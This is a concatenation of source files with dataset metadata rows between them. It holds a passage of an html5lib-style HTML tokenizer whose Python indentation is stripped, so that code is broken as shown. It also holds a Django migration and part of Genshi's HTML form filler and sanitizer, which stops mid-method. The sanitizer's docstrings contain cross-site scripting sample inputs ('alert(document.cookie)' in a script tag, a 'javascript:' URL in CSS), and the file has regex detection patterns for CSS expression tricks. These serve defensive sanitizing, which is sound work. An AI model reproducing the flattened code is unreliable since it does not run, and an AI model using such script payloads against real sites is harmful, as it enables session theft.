self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["data"] += data
self.state = self.commentState
return True
def commentStartDashState(self):
data = self.stream.char()
if data == "-":
self.state = self.commentEndState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"] += "-\uFFFD"
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"incorrect-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["data"] += "-" + data
self.state = self.commentState
return True
def commentState(self):
data = self.stream.char()
if data == "-":
self.state = self.commentEndDashState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"] += "\uFFFD"
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "eof-in-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["data"] += data + \
self.stream.charsUntil(("-", "\u0000"))
return True
def commentEndDashState(self):
data = self.stream.char()
if data == "-":
self.state = self.commentEndState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"] += "-\uFFFD"
self.state = self.commentState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-comment-end-dash"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["data"] += "-" + data
self.state = self.commentState
return True
def commentEndState(self):
data = self.stream.char()
if data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"] += "--\uFFFD"
self.state = self.commentState
elif data == "!":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-bang-after-double-dash-in-comment"})
self.state = self.commentEndBangState
elif data == "-":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-dash-after-double-dash-in-comment"})
self.currentToken["data"] += data
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-comment-double-dash"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
# XXX
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-comment"})
self.currentToken["data"] += "--" + data
self.state = self.commentState
return True
def commentEndBangState(self):
data = self.stream.char()
if data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == "-":
self.currentToken["data"] += "--!"
self.state = self.commentEndDashState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"] += "--!\uFFFD"
self.state = self.commentState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-comment-end-bang-state"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["data"] += "--!" + data
self.state = self.commentState
return True
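    # Comment-closing corner case: for "<!-- x --!>" the "!" is reported
    # as "unexpected-bang-after-double-dash-in-comment" in commentEndState
    # above, and commentEndBangState then either closes the comment on ">"
    # or folds the "--!" back into the comment data.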
def doctypeState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeDoctypeNameState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-doctype-name-but-got-eof"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"need-space-after-doctype"})
self.stream.unget(data)
self.state = self.beforeDoctypeNameState
return True
def beforeDoctypeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-doctype-name-but-got-right-bracket"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["name"] = "\uFFFD"
self.state = self.doctypeNameState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-doctype-name-but-got-eof"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["name"] = data
self.state = self.doctypeNameState
return True
def doctypeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.currentToken["name"] = self.currentToken["name"].translate(asciiUpper2Lower)
self.state = self.afterDoctypeNameState
elif data == ">":
self.currentToken["name"] = self.currentToken["name"].translate(asciiUpper2Lower)
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["name"] += "\uFFFD"
self.state = self.doctypeNameState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype-name"})
self.currentToken["correct"] = False
self.currentToken["name"] = self.currentToken["name"].translate(asciiUpper2Lower)
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["name"] += data
return True
def afterDoctypeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.currentToken["correct"] = False
self.stream.unget(data)
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
if data in ("p", "P"):
matched = True
for expected in (("u", "U"), ("b", "B"), ("l", "L"),
("i", "I"), ("c", "C")):
data = self.stream.char()
if data not in expected:
matched = False
break
if matched:
self.state = self.afterDoctypePublicKeywordState
return True
elif data in ("s", "S"):
matched = True
for expected in (("y", "Y"), ("s", "S"), ("t", "T"),
("e", "E"), ("m", "M")):
data = self.stream.char()
if data not in expected:
matched = False
break
if matched:
self.state = self.afterDoctypeSystemKeywordState
return True
# All the characters read before the current 'data' will be
# [a-zA-Z], so they're garbage in the bogus doctype and can be
# discarded; only the latest character might be '>' or EOF
            # and needs to be pushed back onto the stream (unget)
self.stream.unget(data)
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-space-or-right-bracket-in-doctype", "datavars":
{"data": data}})
self.currentToken["correct"] = False
self.state = self.bogusDoctypeState
return True
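    # afterDoctypeNameState matches the PUBLIC / SYSTEM keywords character
    # by character, case-insensitively, so e.g. "<!DOCTYPE html PuBlIc"
    # still reaches afterDoctypePublicKeywordState; any other word marks
    # the doctype as incorrect and falls through to bogusDoctypeState.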
def afterDoctypePublicKeywordState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeDoctypePublicIdentifierState
elif data in ("'", '"'):
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.stream.unget(data)
self.state = self.beforeDoctypePublicIdentifierState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.stream.unget(data)
self.state = self.beforeDoctypePublicIdentifierState
return True
def beforeDoctypePublicIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == "\"":
self.currentToken["publicId"] = ""
self.state = self.doctypePublicIdentifierDoubleQuotedState
elif data == "'":
self.currentToken["publicId"] = ""
self.state = self.doctypePublicIdentifierSingleQuotedState
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-end-of-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["correct"] = False
self.state = self.bogusDoctypeState
return True
def doctypePublicIdentifierDoubleQuotedState(self):
data = self.stream.char()
if data == "\"":
self.state = self.afterDoctypePublicIdentifierState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["publicId"] += "\uFFFD"
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-end-of-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["publicId"] += data
return True
def doctypePublicIdentifierSingleQuotedState(self):
data = self.stream.char()
if data == "'":
self.state = self.afterDoctypePublicIdentifierState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["publicId"] += "\uFFFD"
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-end-of-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["publicId"] += data
return True
def afterDoctypePublicIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.betweenDoctypePublicAndSystemIdentifiersState
elif data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == '"':
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["systemId"] = ""
self.state = self.doctypeSystemIdentifierDoubleQuotedState
elif data == "'":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["systemId"] = ""
self.state = self.doctypeSystemIdentifierSingleQuotedState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["correct"] = False
self.state = self.bogusDoctypeState
return True
def betweenDoctypePublicAndSystemIdentifiersState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == '"':
self.currentToken["systemId"] = ""
self.state = self.doctypeSystemIdentifierDoubleQuotedState
elif data == "'":
self.currentToken["systemId"] = ""
self.state = self.doctypeSystemIdentifierSingleQuotedState
elif data == EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["correct"] = False
self.state = self.bogusDoctypeState
return True
def afterDoctypeSystemKeywordState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeDoctypeSystemIdentifierState
elif data in ("'", '"'):
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.stream.unget(data)
self.state = self.beforeDoctypeSystemIdentifierState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.stream.unget(data)
self.state = self.beforeDoctypeSystemIdentifierState
return True
def beforeDoctypeSystemIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == "\"":
self.currentToken["systemId"] = ""
self.state = self.doctypeSystemIdentifierDoubleQuotedState
elif data == "'":
self.currentToken["systemId"] = ""
self.state = self.doctypeSystemIdentifierSingleQuotedState
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["correct"] = False
self.state = self.bogusDoctypeState
return True
def doctypeSystemIdentifierDoubleQuotedState(self):
data = self.stream.char()
if data == "\"":
self.state = self.afterDoctypeSystemIdentifierState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["systemId"] += "\uFFFD"
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-end-of-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["systemId"] += data
return True
def doctypeSystemIdentifierSingleQuotedState(self):
data = self.stream.char()
if data == "'":
self.state = self.afterDoctypeSystemIdentifierState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["systemId"] += "\uFFFD"
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-end-of-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["systemId"] += data
return True
def afterDoctypeSystemIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.state = self.bogusDoctypeState
return True
def bogusDoctypeState(self):
data = self.stream.char()
if data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
# XXX EMIT
self.stream.unget(data)
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
pass
return True
def cdataSectionState(self):
data = []
while True:
data.append(self.stream.charsUntil("]"))
data.append(self.stream.charsUntil(">"))
char = self.stream.char()
if char == EOF:
break
else:
assert char == ">"
if data[-1][-2:] == "]]":
data[-1] = data[-1][:-2]
break
else:
data.append(char)
data = "".join(data)
# Deal with null here rather than in the parser
nullCount = data.count("\u0000")
if nullCount > 0:
for i in range(nullCount):
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
data = data.replace("\u0000", "\uFFFD")
if data:
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": data})
self.state = self.dataState
return True
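    # cdataSectionState collects everything up to "]]>" (or EOF) and emits
    # it as a single Characters token, replacing U+0000 with U+FFFD and
    # reporting one "invalid-codepoint" parse error per NULL.  Hedged
    # example (assumption): "<![CDATA[a]]b]]>" in foreign content yields
    # the character data "a]]b".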
| mit | -6,652,863,306,430,962,000 | 43.441941 | 109 | 0.529917 | false |
ECastleton/Popstop | popsicle/orders/migrations/0007_auto_20170425_2210.py | 1 | 1295 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-04-26 04:10
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('orders', '0006_auto_20170424_2037'),
]
operations = [
migrations.AlterModelOptions(
name='flavor',
options={'ordering': ['flavor_name']},
),
migrations.AlterModelOptions(
name='productcategory',
options={'ordering': ['category_name'], 'verbose_name': 'Category', 'verbose_name_plural': 'Categories'},
),
migrations.RemoveField(
model_name='productcategory',
name='flavors',
),
migrations.AddField(
model_name='flavor',
name='category',
field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to='orders.ProductCategory'),
),
migrations.AlterField(
model_name='cateringmenu',
name='end_date',
field=models.DateField(),
),
migrations.AlterField(
model_name='cateringmenu',
name='start_date',
field=models.DateField(),
),
]
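    # In effect this migration inverts the flavor/category relationship:
    # the "flavors" field is removed from ProductCategory and each Flavor
    # now points at its ProductCategory through a ForeignKey (the
    # default=0 written above assumes a category with that primary key
    # already exists).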
| gpl-3.0 | 4,351,846,753,906,317,000 | 29.116279 | 121 | 0.56834 | false |
OpenClovis/SAFplus-Availability-Scalability-Platform | src/ide/genshi/genshi/filters/html.py | 22 | 22797 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2006-2009 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://genshi.edgewall.org/wiki/License.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://genshi.edgewall.org/log/.
"""Implementation of a number of stream filters."""
try:
any
except NameError:
from genshi.util import any
import re
from genshi.core import Attrs, QName, stripentities
from genshi.core import END, START, TEXT, COMMENT
__all__ = ['HTMLFormFiller', 'HTMLSanitizer']
__docformat__ = 'restructuredtext en'
class HTMLFormFiller(object):
"""A stream filter that can populate HTML forms from a dictionary of values.
>>> from genshi.input import HTML
>>> html = HTML('''<form>
... <p><input type="text" name="foo" /></p>
... </form>''', encoding='utf-8')
>>> filler = HTMLFormFiller(data={'foo': 'bar'})
>>> print(html | filler)
<form>
<p><input type="text" name="foo" value="bar"/></p>
</form>
"""
# TODO: only select the first radio button, and the first select option
# (if not in a multiple-select)
# TODO: only apply to elements in the XHTML namespace (or no namespace)?
def __init__(self, name=None, id=None, data=None, passwords=False):
"""Create the filter.
:param name: The name of the form that should be populated. If this
parameter is given, only forms where the ``name`` attribute
value matches the parameter are processed.
:param id: The ID of the form that should be populated. If this
parameter is given, only forms where the ``id`` attribute
value matches the parameter are processed.
:param data: The dictionary of form values, where the keys are the names
of the form fields, and the values are the values to fill
in.
:param passwords: Whether password input fields should be populated.
This is off by default for security reasons (for
example, a password may end up in the browser cache)
:note: Changed in 0.5.2: added the `passwords` option
"""
self.name = name
self.id = id
if data is None:
data = {}
self.data = data
self.passwords = passwords
def __call__(self, stream):
"""Apply the filter to the given stream.
:param stream: the markup event stream to filter
"""
in_form = in_select = in_option = in_textarea = False
select_value = option_value = textarea_value = None
option_start = None
option_text = []
no_option_value = False
for kind, data, pos in stream:
if kind is START:
tag, attrs = data
tagname = tag.localname
if tagname == 'form' and (
self.name and attrs.get('name') == self.name or
self.id and attrs.get('id') == self.id or
not (self.id or self.name)):
in_form = True
elif in_form:
if tagname == 'input':
type = attrs.get('type', '').lower()
if type in ('checkbox', 'radio'):
name = attrs.get('name')
if name and name in self.data:
value = self.data[name]
declval = attrs.get('value')
checked = False
if isinstance(value, (list, tuple)):
if declval is not None:
checked = declval in [unicode(v) for v
in value]
else:
checked = any(value)
else:
if declval is not None:
checked = declval == unicode(value)
elif type == 'checkbox':
checked = bool(value)
if checked:
attrs |= [(QName('checked'), 'checked')]
elif 'checked' in attrs:
attrs -= 'checked'
elif type in ('', 'hidden', 'text') \
or type == 'password' and self.passwords:
name = attrs.get('name')
if name and name in self.data:
value = self.data[name]
if isinstance(value, (list, tuple)):
value = value[0]
if value is not None:
attrs |= [
(QName('value'), unicode(value))
]
elif tagname == 'select':
name = attrs.get('name')
if name in self.data:
select_value = self.data[name]
in_select = True
elif tagname == 'textarea':
name = attrs.get('name')
if name in self.data:
textarea_value = self.data.get(name)
if isinstance(textarea_value, (list, tuple)):
textarea_value = textarea_value[0]
in_textarea = True
elif in_select and tagname == 'option':
option_start = kind, data, pos
option_value = attrs.get('value')
if option_value is None:
no_option_value = True
option_value = ''
in_option = True
continue
yield kind, (tag, attrs), pos
elif in_form and kind is TEXT:
if in_select and in_option:
if no_option_value:
option_value += data
option_text.append((kind, data, pos))
continue
elif in_textarea:
continue
yield kind, data, pos
elif in_form and kind is END:
tagname = data.localname
if tagname == 'form':
in_form = False
elif tagname == 'select':
in_select = False
select_value = None
elif in_select and tagname == 'option':
if isinstance(select_value, (tuple, list)):
selected = option_value in [unicode(v) for v
in select_value]
else:
selected = option_value == unicode(select_value)
okind, (tag, attrs), opos = option_start
if selected:
attrs |= [(QName('selected'), 'selected')]
elif 'selected' in attrs:
attrs -= 'selected'
yield okind, (tag, attrs), opos
if option_text:
for event in option_text:
yield event
in_option = False
no_option_value = False
option_start = option_value = None
option_text = []
elif in_textarea and tagname == 'textarea':
if textarea_value:
yield TEXT, unicode(textarea_value), pos
textarea_value = None
in_textarea = False
yield kind, data, pos
else:
yield kind, data, pos
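    # Hedged usage sketch (field names are illustrative, not from the
    # original docstring): multi-valued data works like the text input in
    # the class docstring above, e.g. filling
    #     <form><select name="c"><option value="1"/><option value="2"/></select></form>
    # with HTMLFormFiller(data={'c': ['2']}) marks the second option as
    # selected, and checkbox/radio inputs are checked when their declared
    # value matches one of the supplied values.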
class HTMLSanitizer(object):
"""A filter that removes potentially dangerous HTML tags and attributes
from the stream.
>>> from genshi import HTML
>>> html = HTML('<div><script>alert(document.cookie)</script></div>', encoding='utf-8')
>>> print(html | HTMLSanitizer())
<div/>
The default set of safe tags and attributes can be modified when the filter
is instantiated. For example, to allow inline ``style`` attributes, the
    following instantiation would work:
>>> html = HTML('<div style="background: #000"></div>', encoding='utf-8')
>>> sanitizer = HTMLSanitizer(safe_attrs=HTMLSanitizer.SAFE_ATTRS | set(['style']))
>>> print(html | sanitizer)
<div style="background: #000"/>
Note that even in this case, the filter *does* attempt to remove dangerous
constructs from style attributes:
>>> html = HTML('<div style="background: url(javascript:void); color: #000"></div>', encoding='utf-8')
>>> print(html | sanitizer)
<div style="color: #000"/>
This handles HTML entities, unicode escapes in CSS and Javascript text, as
well as a lot of other things. However, the style tag is still excluded by
default because it is very hard for such sanitizing to be completely safe,
especially considering how much error recovery current web browsers perform.
It also does some basic filtering of CSS properties that may be used for
typical phishing attacks. For more sophisticated filtering, this class
provides a couple of hooks that can be overridden in sub-classes.
:warn: Note that this special processing of CSS is currently only applied to
style attributes, **not** style elements.
"""
SAFE_TAGS = frozenset(['a', 'abbr', 'acronym', 'address', 'area', 'b',
'big', 'blockquote', 'br', 'button', 'caption', 'center', 'cite',
'code', 'col', 'colgroup', 'dd', 'del', 'dfn', 'dir', 'div', 'dl', 'dt',
'em', 'fieldset', 'font', 'form', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6',
'hr', 'i', 'img', 'input', 'ins', 'kbd', 'label', 'legend', 'li', 'map',
'menu', 'ol', 'optgroup', 'option', 'p', 'pre', 'q', 's', 'samp',
'select', 'small', 'span', 'strike', 'strong', 'sub', 'sup', 'table',
'tbody', 'td', 'textarea', 'tfoot', 'th', 'thead', 'tr', 'tt', 'u',
'ul', 'var'])
SAFE_ATTRS = frozenset(['abbr', 'accept', 'accept-charset', 'accesskey',
'action', 'align', 'alt', 'axis', 'bgcolor', 'border', 'cellpadding',
'cellspacing', 'char', 'charoff', 'charset', 'checked', 'cite', 'class',
'clear', 'cols', 'colspan', 'color', 'compact', 'coords', 'datetime',
'dir', 'disabled', 'enctype', 'for', 'frame', 'headers', 'height',
'href', 'hreflang', 'hspace', 'id', 'ismap', 'label', 'lang',
'longdesc', 'maxlength', 'media', 'method', 'multiple', 'name',
'nohref', 'noshade', 'nowrap', 'prompt', 'readonly', 'rel', 'rev',
'rows', 'rowspan', 'rules', 'scope', 'selected', 'shape', 'size',
'span', 'src', 'start', 'summary', 'tabindex', 'target', 'title',
'type', 'usemap', 'valign', 'value', 'vspace', 'width'])
SAFE_CSS = frozenset([
# CSS 3 properties <http://www.w3.org/TR/CSS/#properties>
'background', 'background-attachment', 'background-color',
'background-image', 'background-position', 'background-repeat',
'border', 'border-bottom', 'border-bottom-color',
'border-bottom-style', 'border-bottom-width', 'border-collapse',
'border-color', 'border-left', 'border-left-color',
'border-left-style', 'border-left-width', 'border-right',
'border-right-color', 'border-right-style', 'border-right-width',
'border-spacing', 'border-style', 'border-top', 'border-top-color',
'border-top-style', 'border-top-width', 'border-width', 'bottom',
'caption-side', 'clear', 'clip', 'color', 'content',
'counter-increment', 'counter-reset', 'cursor', 'direction', 'display',
'empty-cells', 'float', 'font', 'font-family', 'font-size',
'font-style', 'font-variant', 'font-weight', 'height', 'left',
'letter-spacing', 'line-height', 'list-style', 'list-style-image',
'list-style-position', 'list-style-type', 'margin', 'margin-bottom',
'margin-left', 'margin-right', 'margin-top', 'max-height', 'max-width',
'min-height', 'min-width', 'opacity', 'orphans', 'outline',
'outline-color', 'outline-style', 'outline-width', 'overflow',
'padding', 'padding-bottom', 'padding-left', 'padding-right',
'padding-top', 'page-break-after', 'page-break-before',
'page-break-inside', 'quotes', 'right', 'table-layout',
'text-align', 'text-decoration', 'text-indent', 'text-transform',
'top', 'unicode-bidi', 'vertical-align', 'visibility', 'white-space',
'widows', 'width', 'word-spacing', 'z-index',
])
SAFE_SCHEMES = frozenset(['file', 'ftp', 'http', 'https', 'mailto', None])
URI_ATTRS = frozenset(['action', 'background', 'dynsrc', 'href', 'lowsrc',
'src'])
def __init__(self, safe_tags=SAFE_TAGS, safe_attrs=SAFE_ATTRS,
safe_schemes=SAFE_SCHEMES, uri_attrs=URI_ATTRS,
safe_css=SAFE_CSS):
"""Create the sanitizer.
The exact set of allowed elements and attributes can be configured.
:param safe_tags: a set of tag names that are considered safe
:param safe_attrs: a set of attribute names that are considered safe
:param safe_schemes: a set of URI schemes that are considered safe
:param uri_attrs: a set of names of attributes that contain URIs
"""
self.safe_tags = safe_tags
# The set of tag names that are considered safe.
self.safe_attrs = safe_attrs
# The set of attribute names that are considered safe.
self.safe_css = safe_css
# The set of CSS properties that are considered safe.
self.uri_attrs = uri_attrs
# The set of names of attributes that may contain URIs.
self.safe_schemes = safe_schemes
# The set of URI schemes that are considered safe.
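    # Customisation sketch (assumption, in the spirit of the class
    # docstring): the allowed sets are plain frozensets, so callers can
    # extend them at construction time, e.g.
    #     HTMLSanitizer(safe_schemes=HTMLSanitizer.SAFE_SCHEMES | set(['tel']))
    # while finer-grained policies can override is_safe_uri(),
    # is_safe_elem() or is_safe_css() in a subclass.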
# IE6 <http://heideri.ch/jso/#80>
_EXPRESSION_SEARCH = re.compile(u"""
[eE
\uFF25 # FULLWIDTH LATIN CAPITAL LETTER E
\uFF45 # FULLWIDTH LATIN SMALL LETTER E
]
[xX
\uFF38 # FULLWIDTH LATIN CAPITAL LETTER X
\uFF58 # FULLWIDTH LATIN SMALL LETTER X
]
[pP
\uFF30 # FULLWIDTH LATIN CAPITAL LETTER P
\uFF50 # FULLWIDTH LATIN SMALL LETTER P
]
[rR
\u0280 # LATIN LETTER SMALL CAPITAL R
\uFF32 # FULLWIDTH LATIN CAPITAL LETTER R
\uFF52 # FULLWIDTH LATIN SMALL LETTER R
]
[eE
\uFF25 # FULLWIDTH LATIN CAPITAL LETTER E
\uFF45 # FULLWIDTH LATIN SMALL LETTER E
]
[sS
\uFF33 # FULLWIDTH LATIN CAPITAL LETTER S
\uFF53 # FULLWIDTH LATIN SMALL LETTER S
]{2}
[iI
\u026A # LATIN LETTER SMALL CAPITAL I
\uFF29 # FULLWIDTH LATIN CAPITAL LETTER I
\uFF49 # FULLWIDTH LATIN SMALL LETTER I
]
[oO
\uFF2F # FULLWIDTH LATIN CAPITAL LETTER O
\uFF4F # FULLWIDTH LATIN SMALL LETTER O
]
[nN
\u0274 # LATIN LETTER SMALL CAPITAL N
\uFF2E # FULLWIDTH LATIN CAPITAL LETTER N
\uFF4E # FULLWIDTH LATIN SMALL LETTER N
]
""", re.VERBOSE).search
# IE6 <http://openmya.hacker.jp/hasegawa/security/expression.txt>
# 7) Particular bit of Unicode characters
_URL_FINDITER = re.compile(
u'[Uu][Rr\u0280][Ll\u029F]\s*\(([^)]+)').finditer
def __call__(self, stream):
"""Apply the filter to the given stream.
:param stream: the markup event stream to filter
"""
waiting_for = None
for kind, data, pos in stream:
if kind is START:
if waiting_for:
continue
tag, attrs = data
if not self.is_safe_elem(tag, attrs):
waiting_for = tag
continue
new_attrs = []
for attr, value in attrs:
value = stripentities(value)
if attr not in self.safe_attrs:
continue
elif attr in self.uri_attrs:
# Don't allow URI schemes such as "javascript:"
if not self.is_safe_uri(value):
continue
elif attr == 'style':
# Remove dangerous CSS declarations from inline styles
decls = self.sanitize_css(value)
if not decls:
continue
value = '; '.join(decls)
new_attrs.append((attr, value))
yield kind, (tag, Attrs(new_attrs)), pos
elif kind is END:
tag = data
if waiting_for:
if waiting_for == tag:
waiting_for = None
else:
yield kind, data, pos
elif kind is not COMMENT:
if not waiting_for:
yield kind, data, pos
def is_safe_css(self, propname, value):
"""Determine whether the given css property declaration is to be
considered safe for inclusion in the output.
:param propname: the CSS property name
:param value: the value of the property
:return: whether the property value should be considered safe
:rtype: bool
:since: version 0.6
"""
if propname not in self.safe_css:
return False
